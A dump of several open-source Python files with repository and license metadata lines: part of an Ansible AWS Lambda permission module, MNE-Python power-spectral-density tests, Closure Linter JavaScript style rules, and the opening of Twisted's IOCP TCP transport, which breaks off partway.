if len(function_name) > 140:
module.fail_json(msg='ARN name "{0}" exceeds 140 character limit'.format(function_name))
def get_qualifier(module):
"""
Returns the function qualifier as a version or alias or None.
:param module:
:return:
"""
if module.params.get('version') is not None:
return to_native(module.params['version'])
elif module.params['alias']:
return to_native(module.params['alias'])
return None
def extract_statement(policy, sid):
"""return flattened single policy statement from a policy
If a policy statement is present in the policy extract it and
return it in a flattened form. Otherwise return an empty
dictionary.
"""
if 'Statement' not in policy:
return {}
policy_statement = {}
# Now that we have the policy, check if required permission statement is present and flatten to
# simple dictionary if found.
for statement in policy['Statement']:
if statement['Sid'] == sid:
policy_statement['action'] = statement['Action']
policy_statement['principal'] = statement['Principal']['Service']
try:
policy_statement['source_arn'] = statement['Condition']['ArnLike']['AWS:SourceArn']
except KeyError:
pass
try:
policy_statement['source_account'] = statement['Condition']['StringEquals']['AWS:SourceAccount']
except KeyError:
pass
try:
policy_statement['event_source_token'] = statement['Condition']['StringEquals']['lambda:EventSourceToken']
except KeyError:
pass
break
return policy_statement
def get_policy_statement(module, client):
"""Checks that policy exists and if so, that statement ID is present or absent.
:param module:
:param client:
:return:
"""
policy = dict()
sid = module.params['statement_id']
# set API parameters
api_params = set_api_params(module, ('function_name', ))
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
policy_results = None
# check if function policy exists
try:
policy_results = client.get_policy(**api_params)
except ClientError as e:
try:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
return {}
except AttributeError: # catches ClientErrors without response, e.g. fail before connect
pass
module.fail_json_aws(e, msg="retrieving function policy")
except Exception as e:
module.fail_json_aws(e, msg="retrieving function policy")
# get_policy returns a JSON string so must convert to dict before reassigning to its key
policy = json.loads(policy_results.get('Policy', '{}'))
return extract_statement(policy, sid)
def add_policy_permission(module, client):
"""
Adds a permission statement to the policy.
:param module:
:param aws:
:return:
"""
changed = False
# set API parameters
params = (
'function_name',
'statement_id',
'action',
'principal',
'source_arn',
'source_account',
'event_source_token')
api_params = set_api_params(module, params)
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
if not module.check_mode:
try:
client.add_permission(**api_params)
except Exception as e:
module.fail_json_aws(e, msg="adding permission to policy")
changed = True
return changed
def remove_policy_permission(module, client):
"""
Removed a permission statement from the policy.
:param module:
:param aws:
:return:
"""
changed = False
# set API parameters
api_params = set_api_params(module, ('function_name', 'statement_id'))
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
try:
if not module.check_mode:
client.remove_permission(**api_params)
changed = True
except Exception as e:
module.fail_json_aws(e, msg="removing permission from policy")
return changed
def manage_state(module, lambda_client):
changed = False
current_state = 'absent'
state = module.params['state']
action_taken = 'none'
# check if the policy exists
current_policy_statement = get_policy_statement(module, lambda_client)
if current_policy_statement:
current_state = 'present'
if state == 'present':
if current_state == 'present' and not policy_equal(module, current_policy_statement):
remove_policy_permission(module, lambda_client)
changed = add_policy_permission(module, lambda_client)
action_taken = 'updated'
if not current_state == 'present':
changed = add_policy_permission(module, lambda_client)
action_taken = 'added'
elif current_state == 'present':
# remove the policy statement
changed = remove_policy_permission(module, lambda_client)
action_taken = 'deleted'
return dict(changed=changed, ansible_facts=dict(lambda_policy_action=action_taken))
def setup_client(module):
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='lambda', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
return connection
def setup_module_object():
argument_spec = dict(
state=dict(default='present', choices=['present', 'absent']),
function_name=dict(required=True, aliases=['lambda_function_arn', 'function_arn']),
statement_id=dict(required=True, aliases=['sid']),
alias=dict(),
version=dict(type='int'),
action=dict(required=True, ),
principal=dict(required=True, ),
source_arn=dict(),
source_account=dict(),
event_source_token=dict(),
)
return AnsibleAWSModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[['alias', 'version'],
['event_source_token', 'source_arn'],
['event_source_token', 'source_account']],
)
def main():
"""
Main entry point.
:return dict: ansible facts
"""
module = setup_module_object()
client = setup_client(module)
validate_params(module)
results = manage_state(module, client)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
nicproulx/mne-python
|
mne/time_frequency/tests/test_psd.py
|
2
|
7360
|
import numpy as np
import os.path as op
from numpy.testing import assert_array_almost_equal, assert_raises
from nose.tools import assert_true
from mne import pick_types, Epochs, read_events
from mne.io import RawArray, read_raw_fif
from mne.utils import requires_version, slow_test, run_tests_if_main
from mne.time_frequency import psd_welch, psd_multitaper
base_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_fname = op.join(base_dir, 'test-eve.fif')
@requires_version('scipy', '0.12')
def test_psd():
"""Tests the welch and multitaper PSD."""
raw = read_raw_fif(raw_fname)
picks_psd = [0, 1]
# Populate raw with sinusoids
rng = np.random.RandomState(40)
data = 0.1 * rng.randn(len(raw.ch_names), raw.n_times)
freqs_sig = [8., 50.]
for ix, freq in zip(picks_psd, freqs_sig):
data[ix, :] += 2 * np.sin(np.pi * 2. * freq * raw.times)
first_samp = raw._first_samps[0]
raw = RawArray(data, raw.info)
tmin, tmax = 0, 20 # use a few seconds of data
fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz
n_fft = 128
# -- Raw --
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
kws_welch = dict(n_fft=n_fft)
kws_mt = dict(low_bias=True)
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(raw, proj=False, **kws)
psds_proj, freqs_proj = func(raw, proj=True, **kws)
assert_true(psds.shape == (len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Is power found where it should be
ixs_max = np.argmax(psds, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj)
# Array input shouldn't work
assert_raises(ValueError, func, raw[:3, :20][0])
# test n_per_seg in psd_welch (and padding)
psds1, freqs1 = psd_welch(raw, proj=False, n_fft=128, n_per_seg=128,
**kws_psd)
psds2, freqs2 = psd_welch(raw, proj=False, n_fft=256, n_per_seg=128,
**kws_psd)
assert_true(len(freqs1) == np.floor(len(freqs2) / 2.))
assert_true(psds1.shape[-1] == np.floor(psds2.shape[-1] / 2.))
# tests ValueError when n_per_seg=None and n_fft > signal length
kws_psd.update(dict(n_fft=tmax * 1.1 * raw.info['sfreq']))
assert_raises(ValueError, psd_welch, raw, proj=False, n_per_seg=None,
**kws_psd)
# ValueError when n_overlap > n_per_seg
kws_psd.update(dict(n_fft=128, n_per_seg=64, n_overlap=90))
assert_raises(ValueError, psd_welch, raw, proj=False, **kws_psd)
# -- Epochs/Evoked --
events = read_events(event_fname)
events[:, 0] -= first_samp
tmin, tmax, event_id = -0.5, 0.5, 1
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks_psd,
proj=False, preload=True, baseline=None)
evoked = epochs.average()
tmin_full, tmax_full = -1, 1
epochs_full = Epochs(raw, events[:10], event_id, tmin_full, tmax_full,
picks=picks_psd, proj=False, preload=True,
baseline=None)
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(
epochs[:1], proj=False, **kws)
psds_proj, freqs_proj = func(
epochs[:1], proj=True, **kws)
psds_f, freqs_f = func(
epochs_full[:1], proj=False, **kws)
# this one will fail if you add for example 0.1 to tmin
assert_array_almost_equal(psds, psds_f, 27)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj, 27)
# Is power found where it should be
ixs_max = np.argmax(psds.mean(0), axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
assert_true(psds.shape == (1, len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Array input shouldn't work
assert_raises(ValueError, func, epochs.get_data())
# Testing evoked (doesn't work w/ compute_epochs_psd)
psds_ev, freqs_ev = func(
evoked, proj=False, **kws)
psds_ev_proj, freqs_ev_proj = func(
evoked, proj=True, **kws)
# Is power found where it should be
ixs_max = np.argmax(psds_ev, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs_ev))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds_ev, psds_ev_proj, 27)
assert_true(psds_ev.shape == (len(kws['picks']), len(freqs)))
@slow_test
@requires_version('scipy', '0.12')
def test_compares_psd():
"""Test PSD estimation on raw for plt.psd and scipy.signal.welch."""
raw = read_raw_fif(raw_fname)
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
# picks MEG gradiometers
picks = pick_types(raw.info, meg='grad', eeg=False, stim=False,
exclude=exclude)[:2]
tmin, tmax = 0, 10 # use the first 60s of data
fmin, fmax = 2, 70 # look at frequencies between 5 and 70Hz
n_fft = 2048
# Compute psds with the new implementation using Welch
psds_welch, freqs_welch = psd_welch(raw, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, proj=False, picks=picks,
n_fft=n_fft, n_jobs=1)
# Compute psds with plt.psd
start, stop = raw.time_as_index([tmin, tmax])
data, times = raw[picks, start:(stop + 1)]
from matplotlib.pyplot import psd
out = [psd(d, Fs=raw.info['sfreq'], NFFT=n_fft) for d in data]
freqs_mpl = out[0][1]
psds_mpl = np.array([o[0] for o in out])
mask = (freqs_mpl >= fmin) & (freqs_mpl <= fmax)
freqs_mpl = freqs_mpl[mask]
psds_mpl = psds_mpl[:, mask]
assert_array_almost_equal(psds_welch, psds_mpl)
assert_array_almost_equal(freqs_welch, freqs_mpl)
assert_true(psds_welch.shape == (len(picks), len(freqs_welch)))
assert_true(psds_mpl.shape == (len(picks), len(freqs_mpl)))
assert_true(np.sum(freqs_welch < 0) == 0)
assert_true(np.sum(freqs_mpl < 0) == 0)
assert_true(np.sum(psds_welch < 0) == 0)
assert_true(np.sum(psds_mpl < 0) == 0)
run_tests_if_main()
|
bsd-3-clause
|
ThirdProject/android_external_chromium_org
|
third_party/closure_linter/closure_linter/javascriptlintrules.py
|
108
|
23113
|
#!/usr/bin/env python
#
# Copyright 2011 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods for checking JS files for common style guide violations.
These style guide violations should only apply to JavaScript and not an Ecma
scripting languages.
"""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)',
'jacobr@google.com (Jacob Richman)')
import re
from sets import Set
from closure_linter import ecmalintrules
from closure_linter import error_check
from closure_linter import errors
from closure_linter import javascripttokenizer
from closure_linter import javascripttokens
from closure_linter import requireprovidesorter
from closure_linter import tokenutil
from closure_linter.common import error
from closure_linter.common import position
# Shorthand
Error = error.Error
Position = position.Position
Rule = error_check.Rule
Type = javascripttokens.JavaScriptTokenType
class JavaScriptLintRules(ecmalintrules.EcmaScriptLintRules):
"""JavaScript lint rules that catch JavaScript specific style errors."""
def __init__(self, namespaces_info):
"""Initializes a JavaScriptLintRules instance."""
ecmalintrules.EcmaScriptLintRules.__init__(self)
self._namespaces_info = namespaces_info
self._declared_private_member_tokens = {}
self._declared_private_members = Set()
self._used_private_members = Set()
def HandleMissingParameterDoc(self, token, param_name):
"""Handle errors associated with a parameter missing a param tag."""
self._HandleError(errors.MISSING_PARAMETER_DOCUMENTATION,
'Missing docs for parameter: "%s"' % param_name, token)
def __ContainsRecordType(self, token):
"""Check whether the given token contains a record type.
Args:
token: The token being checked
Returns:
True if the token contains a record type, False otherwise.
"""
# If we see more than one left-brace in the string of an annotation token,
# then there's a record type in there.
return (
token and token.type == Type.DOC_FLAG and
token.attached_object.type is not None and
token.attached_object.type.find('{') != token.string.rfind('{'))
def CheckToken(self, token, state):
"""Checks a token, given the current parser_state, for warnings and errors.
Args:
token: The current token under consideration
state: parser_state object that indicates the current state in the page
"""
if self.__ContainsRecordType(token):
# We should bail out and not emit any warnings for this annotation.
# TODO(nicksantos): Support record types for real.
state.GetDocComment().Invalidate()
return
# Call the base class's CheckToken function.
super(JavaScriptLintRules, self).CheckToken(token, state)
# Store some convenience variables
namespaces_info = self._namespaces_info
if error_check.ShouldCheck(Rule.UNUSED_PRIVATE_MEMBERS):
# Find all assignments to private members.
if token.type == Type.SIMPLE_LVALUE:
identifier = token.string
if identifier.endswith('_') and not identifier.endswith('__'):
doc_comment = state.GetDocComment()
suppressed = (doc_comment and doc_comment.HasFlag('suppress') and
doc_comment.GetFlag('suppress').type == 'underscore')
if not suppressed:
# Look for static members defined on a provided namespace.
namespace = namespaces_info.GetClosurizedNamespace(identifier)
provided_namespaces = namespaces_info.GetProvidedNamespaces()
# Skip cases of this.something_.somethingElse_.
regex = re.compile('^this\.[a-zA-Z_]+$')
if namespace in provided_namespaces or regex.match(identifier):
variable = identifier.split('.')[-1]
self._declared_private_member_tokens[variable] = token
self._declared_private_members.add(variable)
elif not identifier.endswith('__'):
# Consider setting public members of private members to be a usage.
for piece in identifier.split('.'):
if piece.endswith('_'):
self._used_private_members.add(piece)
# Find all usages of private members.
if token.type == Type.IDENTIFIER:
for piece in token.string.split('.'):
if piece.endswith('_'):
self._used_private_members.add(piece)
if token.type == Type.DOC_FLAG:
flag = token.attached_object
if flag.flag_type == 'param' and flag.name_token is not None:
self._CheckForMissingSpaceBeforeToken(
token.attached_object.name_token)
if (error_check.ShouldCheck(Rule.OPTIONAL_TYPE_MARKER) and
flag.type is not None and flag.name is not None):
# Check for optional marker in type.
if (flag.type.endswith('=') and
not flag.name.startswith('opt_')):
self._HandleError(errors.JSDOC_MISSING_OPTIONAL_PREFIX,
'Optional parameter name %s must be prefixed '
'with opt_.' % flag.name,
token)
elif (not flag.type.endswith('=') and
flag.name.startswith('opt_')):
self._HandleError(errors.JSDOC_MISSING_OPTIONAL_TYPE,
'Optional parameter %s type must end with =.' %
flag.name,
token)
if flag.flag_type in state.GetDocFlag().HAS_TYPE:
# Check for both missing type token and empty type braces '{}'
# Missing suppress types are reported separately and we allow enums
# without types.
if (flag.flag_type not in ('suppress', 'enum') and
(not flag.type or flag.type.isspace())):
self._HandleError(errors.MISSING_JSDOC_TAG_TYPE,
'Missing type in %s tag' % token.string, token)
elif flag.name_token and flag.type_end_token and tokenutil.Compare(
flag.type_end_token, flag.name_token) > 0:
self._HandleError(
errors.OUT_OF_ORDER_JSDOC_TAG_TYPE,
'Type should be immediately after %s tag' % token.string,
token)
elif token.type == Type.DOUBLE_QUOTE_STRING_START:
next_token = token.next
while next_token.type == Type.STRING_TEXT:
if javascripttokenizer.JavaScriptTokenizer.SINGLE_QUOTE.search(
next_token.string):
break
next_token = next_token.next
else:
self._HandleError(
errors.UNNECESSARY_DOUBLE_QUOTED_STRING,
'Single-quoted string preferred over double-quoted string.',
token,
Position.All(token.string))
elif token.type == Type.END_DOC_COMMENT:
doc_comment = state.GetDocComment()
# When @externs appears in a @fileoverview comment, it should trigger
# the same limited doc checks as a special filename like externs.js.
if doc_comment.HasFlag('fileoverview') and doc_comment.HasFlag('externs'):
self._SetLimitedDocChecks(True)
if (error_check.ShouldCheck(Rule.BLANK_LINES_AT_TOP_LEVEL) and
not self._is_html and state.InTopLevel() and not state.InBlock()):
# Check if we're in a fileoverview or constructor JsDoc.
is_constructor = (
doc_comment.HasFlag('constructor') or
doc_comment.HasFlag('interface'))
is_file_overview = doc_comment.HasFlag('fileoverview')
# If the comment is not a file overview, and it does not immediately
# precede some code, skip it.
# NOTE: The tokenutil methods are not used here because of their
# behavior at the top of a file.
next_token = token.next
if (not next_token or
(not is_file_overview and next_token.type in Type.NON_CODE_TYPES)):
return
# Don't require extra blank lines around suppression of extra
# goog.require errors.
if (doc_comment.SuppressionOnly() and
next_token.type == Type.IDENTIFIER and
next_token.string in ['goog.provide', 'goog.require']):
return
# Find the start of this block (include comments above the block, unless
# this is a file overview).
block_start = doc_comment.start_token
if not is_file_overview:
token = block_start.previous
while token and token.type in Type.COMMENT_TYPES:
block_start = token
token = token.previous
# Count the number of blank lines before this block.
blank_lines = 0
token = block_start.previous
while token and token.type in [Type.WHITESPACE, Type.BLANK_LINE]:
if token.type == Type.BLANK_LINE:
# A blank line.
blank_lines += 1
elif token.type == Type.WHITESPACE and not token.line.strip():
# A line with only whitespace on it.
blank_lines += 1
token = token.previous
# Log errors.
error_message = False
expected_blank_lines = 0
if is_file_overview and blank_lines == 0:
error_message = 'Should have a blank line before a file overview.'
expected_blank_lines = 1
elif is_constructor and blank_lines != 3:
error_message = (
'Should have 3 blank lines before a constructor/interface.')
expected_blank_lines = 3
elif not is_file_overview and not is_constructor and blank_lines != 2:
error_message = 'Should have 2 blank lines between top-level blocks.'
expected_blank_lines = 2
if error_message:
self._HandleError(
errors.WRONG_BLANK_LINE_COUNT, error_message,
block_start, Position.AtBeginning(),
expected_blank_lines - blank_lines)
elif token.type == Type.END_BLOCK:
if state.InFunction() and state.IsFunctionClose():
is_immediately_called = (token.next and
token.next.type == Type.START_PAREN)
function = state.GetFunction()
if not self._limited_doc_checks:
if (function.has_return and function.doc and
not is_immediately_called and
not function.doc.HasFlag('return') and
not function.doc.InheritsDocumentation() and
not function.doc.HasFlag('constructor')):
# Check for proper documentation of return value.
self._HandleError(
errors.MISSING_RETURN_DOCUMENTATION,
'Missing @return JsDoc in function with non-trivial return',
function.doc.end_token, Position.AtBeginning())
elif (not function.has_return and
not function.has_throw and
function.doc and
function.doc.HasFlag('return') and
not state.InInterfaceMethod()):
return_flag = function.doc.GetFlag('return')
if (return_flag.type is None or (
'undefined' not in return_flag.type and
'void' not in return_flag.type and
'*' not in return_flag.type)):
self._HandleError(
errors.UNNECESSARY_RETURN_DOCUMENTATION,
'Found @return JsDoc on function that returns nothing',
return_flag.flag_token, Position.AtBeginning())
if state.InFunction() and state.IsFunctionClose():
is_immediately_called = (token.next and
token.next.type == Type.START_PAREN)
if (function.has_this and function.doc and
not function.doc.HasFlag('this') and
not function.is_constructor and
not function.is_interface and
'.prototype.' not in function.name):
self._HandleError(
errors.MISSING_JSDOC_TAG_THIS,
'Missing @this JsDoc in function referencing "this". ('
'this usually means you are trying to reference "this" in '
'a static function, or you have forgotten to mark a '
'constructor with @constructor)',
function.doc.end_token, Position.AtBeginning())
elif token.type == Type.IDENTIFIER:
if token.string == 'goog.inherits' and not state.InFunction():
if state.GetLastNonSpaceToken().line_number == token.line_number:
self._HandleError(
errors.MISSING_LINE,
'Missing newline between constructor and goog.inherits',
token,
Position.AtBeginning())
extra_space = state.GetLastNonSpaceToken().next
while extra_space != token:
if extra_space.type == Type.BLANK_LINE:
self._HandleError(
errors.EXTRA_LINE,
'Extra line between constructor and goog.inherits',
extra_space)
extra_space = extra_space.next
# TODO(robbyw): Test the last function was a constructor.
# TODO(robbyw): Test correct @extends and @implements documentation.
elif (token.string == 'goog.provide' and
not state.InFunction() and
namespaces_info is not None):
namespace = tokenutil.Search(token, Type.STRING_TEXT).string
# Report extra goog.provide statement.
if namespaces_info.IsExtraProvide(token):
self._HandleError(
errors.EXTRA_GOOG_PROVIDE,
'Unnecessary goog.provide: ' + namespace,
token, position=Position.AtBeginning())
if namespaces_info.IsLastProvide(token):
# Report missing provide statements after the last existing provide.
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides,
tokenutil.GetLastTokenInSameLine(token).next,
False)
# If there are no require statements, missing requires should be
# reported after the last provide.
if not namespaces_info.GetRequiredNamespaces():
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires,
tokenutil.GetLastTokenInSameLine(token).next,
True)
elif (token.string == 'goog.require' and
not state.InFunction() and
namespaces_info is not None):
namespace = tokenutil.Search(token, Type.STRING_TEXT).string
# If there are no provide statements, missing provides should be
# reported before the first require.
if (namespaces_info.IsFirstRequire(token) and
not namespaces_info.GetProvidedNamespaces()):
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides,
tokenutil.GetFirstTokenInSameLine(token),
True)
# Report extra goog.require statement.
if namespaces_info.IsExtraRequire(token):
self._HandleError(
errors.EXTRA_GOOG_REQUIRE,
'Unnecessary goog.require: ' + namespace,
token, position=Position.AtBeginning())
# Report missing goog.require statements.
if namespaces_info.IsLastRequire(token):
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires,
tokenutil.GetLastTokenInSameLine(token).next,
False)
elif token.type == Type.OPERATOR:
last_in_line = token.IsLastInLine()
# If the token is unary and appears to be used in a unary context
# it's ok. Otherwise, if it's at the end of the line or immediately
# before a comment, it's ok.
# Don't report an error before a start bracket - it will be reported
# by that token's space checks.
if (not token.metadata.IsUnaryOperator() and not last_in_line
and not token.next.IsComment()
and not token.next.IsOperator(',')
and not token.next.type in (Type.WHITESPACE, Type.END_PAREN,
Type.END_BRACKET, Type.SEMICOLON,
Type.START_BRACKET)):
self._HandleError(
errors.MISSING_SPACE,
'Missing space after "%s"' % token.string,
token,
Position.AtEnd(token.string))
elif token.type == Type.WHITESPACE:
first_in_line = token.IsFirstInLine()
last_in_line = token.IsLastInLine()
# Check whitespace length if it's not the first token of the line and
# if it's not immediately before a comment.
if not last_in_line and not first_in_line and not token.next.IsComment():
# Ensure there is no space after opening parentheses.
if (token.previous.type in (Type.START_PAREN, Type.START_BRACKET,
Type.FUNCTION_NAME)
or token.next.type == Type.START_PARAMETERS):
self._HandleError(
errors.EXTRA_SPACE,
'Extra space after "%s"' % token.previous.string,
token,
Position.All(token.string))
def _ReportMissingProvides(self, missing_provides, token, need_blank_line):
"""Reports missing provide statements to the error handler.
Args:
missing_provides: A list of strings where each string is a namespace that
should be provided, but is not.
token: The token where the error was detected (also where the new provides
will be inserted.
need_blank_line: Whether a blank line needs to be inserted after the new
provides are inserted. May be True, False, or None, where None
indicates that the insert location is unknown.
"""
self._HandleError(
errors.MISSING_GOOG_PROVIDE,
'Missing the following goog.provide statements:\n' +
'\n'.join(map(lambda x: 'goog.provide(\'%s\');' % x,
sorted(missing_provides))),
token, position=Position.AtBeginning(),
fix_data=(missing_provides, need_blank_line))
def _ReportMissingRequires(self, missing_requires, token, need_blank_line):
"""Reports missing require statements to the error handler.
Args:
missing_requires: A list of strings where each string is a namespace that
should be required, but is not.
token: The token where the error was detected (also where the new requires
will be inserted.
need_blank_line: Whether a blank line needs to be inserted before the new
requires are inserted. May be True, False, or None, where None
indicates that the insert location is unknown.
"""
self._HandleError(
errors.MISSING_GOOG_REQUIRE,
'Missing the following goog.require statements:\n' +
'\n'.join(map(lambda x: 'goog.require(\'%s\');' % x,
sorted(missing_requires))),
token, position=Position.AtBeginning(),
fix_data=(missing_requires, need_blank_line))
def Finalize(self, state, tokenizer_mode):
"""Perform all checks that need to occur after all lines are processed."""
# Call the base class's Finalize function.
super(JavaScriptLintRules, self).Finalize(state, tokenizer_mode)
if error_check.ShouldCheck(Rule.UNUSED_PRIVATE_MEMBERS):
# Report an error for any declared private member that was never used.
unused_private_members = (self._declared_private_members -
self._used_private_members)
for variable in unused_private_members:
token = self._declared_private_member_tokens[variable]
self._HandleError(errors.UNUSED_PRIVATE_MEMBER,
'Unused private member: %s.' % token.string,
token)
# Clear state to prepare for the next file.
self._declared_private_member_tokens = {}
self._declared_private_members = Set()
self._used_private_members = Set()
namespaces_info = self._namespaces_info
if namespaces_info is not None:
# If there are no provide or require statements, missing provides and
# requires should be reported on line 1.
if (not namespaces_info.GetProvidedNamespaces() and
not namespaces_info.GetRequiredNamespaces()):
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides, state.GetFirstToken(), None)
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires, state.GetFirstToken(), None)
self._CheckSortedRequiresProvides(state.GetFirstToken())
def _CheckSortedRequiresProvides(self, token):
"""Checks that all goog.require and goog.provide statements are sorted.
Note that this method needs to be run after missing statements are added to
preserve alphabetical order.
Args:
token: The first token in the token stream.
"""
sorter = requireprovidesorter.RequireProvideSorter()
provides_result = sorter.CheckProvides(token)
if provides_result:
self._HandleError(
errors.GOOG_PROVIDES_NOT_ALPHABETIZED,
'goog.provide classes must be alphabetized. The correct code is:\n' +
'\n'.join(
map(lambda x: 'goog.provide(\'%s\');' % x, provides_result[1])),
provides_result[0],
position=Position.AtBeginning(),
fix_data=provides_result[0])
requires_result = sorter.CheckRequires(token)
if requires_result:
self._HandleError(
errors.GOOG_REQUIRES_NOT_ALPHABETIZED,
'goog.require classes must be alphabetized. The correct code is:\n' +
'\n'.join(
map(lambda x: 'goog.require(\'%s\');' % x, requires_result[1])),
requires_result[0],
position=Position.AtBeginning(),
fix_data=requires_result[0])
def GetLongLineExceptions(self):
"""Gets a list of regexps for lines which can be longer than the limit."""
return [
re.compile('goog\.require\(.+\);?\s*$'),
re.compile('goog\.provide\(.+\);?\s*$')
]
|
bsd-3-clause
|
candy7393/VTK
|
ThirdParty/Twisted/twisted/internet/iocpreactor/tcp.py
|
23
|
18235
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
TCP support for IOCP reactor
"""
import socket, operator, errno, struct
from zope.interface import implements, classImplements
from twisted.internet import interfaces, error, address, main, defer
from twisted.internet.abstract import _LogOwner, isIPAddress, isIPv6Address
from twisted.internet.tcp import _SocketCloser, Connector as TCPConnector
from twisted.internet.tcp import _AbortingMixin, _BaseBaseClient, _BaseTCPClient
from twisted.python import log, failure, reflect, util
from twisted.internet.iocpreactor import iocpsupport as _iocp, abstract
from twisted.internet.iocpreactor.interfaces import IReadWriteHandle
from twisted.internet.iocpreactor.const import ERROR_IO_PENDING
from twisted.internet.iocpreactor.const import SO_UPDATE_CONNECT_CONTEXT
from twisted.internet.iocpreactor.const import SO_UPDATE_ACCEPT_CONTEXT
from twisted.internet.iocpreactor.const import ERROR_CONNECTION_REFUSED
from twisted.internet.iocpreactor.const import ERROR_NETWORK_UNREACHABLE
try:
from twisted.internet._newtls import startTLS as _startTLS
except ImportError:
_startTLS = None
# ConnectEx returns these. XXX: find out what it does for timeout
connectExErrors = {
ERROR_CONNECTION_REFUSED: errno.WSAECONNREFUSED,
ERROR_NETWORK_UNREACHABLE: errno.WSAENETUNREACH,
}
class Connection(abstract.FileHandle, _SocketCloser, _AbortingMixin):
"""
@ivar TLS: C{False} to indicate the connection is in normal TCP mode,
C{True} to indicate that TLS has been started and that operations must
be routed through the L{TLSMemoryBIOProtocol} instance.
"""
implements(IReadWriteHandle, interfaces.ITCPTransport,
interfaces.ISystemHandle)
TLS = False
def __init__(self, sock, proto, reactor=None):
abstract.FileHandle.__init__(self, reactor)
self.socket = sock
self.getFileHandle = sock.fileno
self.protocol = proto
def getHandle(self):
return self.socket
def dataReceived(self, rbuffer):
# XXX: some day, we'll have protocols that can handle raw buffers
self.protocol.dataReceived(str(rbuffer))
def readFromHandle(self, bufflist, evt):
return _iocp.recv(self.getFileHandle(), bufflist, evt)
def writeToHandle(self, buff, evt):
"""
Send C{buff} to current file handle using C{_iocp.send}. The buffer
sent is limited to a size of C{self.SEND_LIMIT}.
"""
return _iocp.send(self.getFileHandle(),
buffer(buff, 0, self.SEND_LIMIT), evt)
def _closeWriteConnection(self):
try:
self.socket.shutdown(1)
except socket.error:
pass
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.writeConnectionLost()
except:
f = failure.Failure()
log.err()
self.connectionLost(f)
def readConnectionLost(self, reason):
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.readConnectionLost()
except:
log.err()
self.connectionLost(failure.Failure())
else:
self.connectionLost(reason)
def connectionLost(self, reason):
if self.disconnected:
return
abstract.FileHandle.connectionLost(self, reason)
isClean = (reason is None or
not reason.check(error.ConnectionAborted))
self._closeSocket(isClean)
protocol = self.protocol
del self.protocol
del self.socket
del self.getFileHandle
protocol.connectionLost(reason)
def logPrefix(self):
"""
Return the prefix to log with when I own the logging thread.
"""
return self.logstr
def getTcpNoDelay(self):
return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY))
def setTcpNoDelay(self, enabled):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)
def getTcpKeepAlive(self):
return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_KEEPALIVE))
def setTcpKeepAlive(self, enabled):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
if _startTLS is not None:
